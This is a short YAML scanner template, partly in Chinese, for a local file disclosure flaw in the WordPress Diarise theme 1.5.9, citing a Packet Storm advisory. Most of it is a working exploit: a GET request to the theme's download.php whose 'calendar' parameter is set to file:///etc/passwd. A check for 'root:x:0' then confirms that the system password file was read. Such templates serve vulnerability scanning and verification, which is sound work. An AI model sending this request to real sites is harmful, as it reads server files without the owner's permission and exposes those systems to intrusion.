product: WordPress
vName: WordPress Diarise 1.5.9 Local File Disclosure
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress Diarise theme version 1.5.9 suffers from a local file disclosure
  vulnerability.
version: ''
note: ''
search: { }
protocol: http
link: https://packetstormsecurity.com/files/152773/WordPress-Diarise-1.5.9-Local-File-Disclosure.html
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-content/themes/diarise/download.php?calendar=file:///etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
        - status: 200
